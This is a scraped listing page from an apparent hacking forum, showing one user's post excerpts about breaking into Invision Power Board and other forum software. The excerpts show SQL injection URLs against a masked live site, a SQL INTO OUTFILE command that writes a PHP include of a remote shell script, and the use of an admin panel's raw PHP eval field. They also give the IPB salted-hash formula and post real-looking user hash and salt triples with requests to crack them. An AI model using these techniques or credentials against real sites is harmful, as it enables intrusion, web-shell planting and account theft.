 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 66
 Members: 0
 Total: 66
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
| epro |
|
| Replies: 79 |
| Views: 160927 |
|
|
 |
|
 |
|
| Hello, is it possibility to get admin passhash and salt with SQL injection, not exploit, because I have vulnerable forum, but exploit don't want to work.. So? |
|
|
|
| epro |
|
| Replies: 5 |
| Views: 9716 |
|
|
|
|
|
|
| Yes, for thing like you said is wordlists! Bruteforce aim is to check all possibilities to find password! No clever algorithm! Just numbers, letters and special symbols! |
|
|
|
| epro |
|
| Replies: 10 |
| Views: 14307 |
|
|
|
|
|
|
| You are writting incorect algorithm. IPB uses md5(md5($salt).md5($pass)) [PHP] not simply md5! |
|
|
|
| epro |
|
| Replies: 2 |
| Views: 12033 |
|
|
|
|
|
|
Invision Power Board 1.3
For this version there are directories and files like these:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
ssi.php
show.php
css.php
conf_mime_types.php
Invision ... |
|
|
|
| epro |
|
| Replies: 3 |
| Views: 6361 |
|
|
|
|
|
|
few more: can somebody please crack them?
9d6268f371d6a0f893c9f31542651528:%'9DI
d61a710176fc40bf5ef80b094bbe135c:Ib]gB
cb8c14a79dcdf3df13aa173585915105:>fL2f
5f6699986e12f2a5640cb8f7bb37411d ... |
|
|
|
| epro |
|
| Replies: 6 |
| Views: 12040 |
|
|
|
|
|
|
I can't explain you this onw, but I can show one other, which is working very well!
Go to "Tools & Settings", select any of them, then press "Add New Setting", then in line "Raw PHP code to eva ... |
|
|
|
| epro |
|
| Replies: 3 |
| Views: 6361 |
|
|
|
|
|
|
BIG thanks to you!  |
|
|
|
| epro |
|
| Replies: 3 |
| Views: 6361 |
|
|
|
|
|
|
Hello, I have few salted hashes that I need to be decrypted.
user:hash:salt
tnet:2129115fc56adeca6b56ea8e35047327:8t"l#
aKa:8c1f077556b15d0089b2a54e155180ab:xmmR=
Mo4itajs:f8170ff8d027602a ... |
|
|
|
| epro |
|
| Replies: 6 |
| Views: 12040 |
|
|
|
|
|
|
| Hy, I get admin password in IPB 2.3.5 forum and I tried to upload shell. I tried sql command in sql toolbox: SELECT '<? @include("http://myhost/w4priv.php"); ?>' INTO OUTFILE '/opt/hosting/somet ... |
|
|
|
| epro |
|
| Replies: 2 |
| Views: 6218 |
|
|
|
|
|
|
| This username/password is for web page were the injection was. So you need to find admin login page/ maybe user login page works too. Then in Admin Panel you look for uploading page or something like ... |
|
|
|
| epro |
|
| Replies: 2 |
| Views: 7067 |
|
|
|
|
|
|
| If you are banned on IP, then no cookies will be working, because you are BANNED. You need to use proxy and then try cookie hack (I don't know for what versions does it work), maybe try some other hac ... |
|
|
|
| epro |
|
| Replies: 2 |
| Views: 8886 |
|
|
|
|
|
|
Simply, the server administrator is smart an you cannot read mysql.user or information_shema or other tables where are BIG information.. 
But you can guess table names from that web page, and then ... |
|
|
|
| epro |
|
| Replies: 5 |
| Views: 9326 |
|
|
|
|
|
|
OK, I already thought so.
So:
with this injection, I found that the prefix for g2_User is creatiff.
http://*****.org/kom.php?akcja=dodaj&parentid=0+union+select+1,UNHEX(HEX(table_sc ... |
|
|
|
| epro |
|
| Replies: 5 |
| Views: 9326 |
|
|
|
|
|
|
Maybe thers prefix.. :/
If you give me site via PM, I can try some injections to see, are there prefix or not.. :/ |
|
|
|
| epro |
|
| Replies: 15 |
| Views: 25911 |
|
|
|
|
|
|
| Ok I can't crack any more hashes.. :/ |
|
|
| Page 1 of 2 |
Goto page 1, 2Next
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
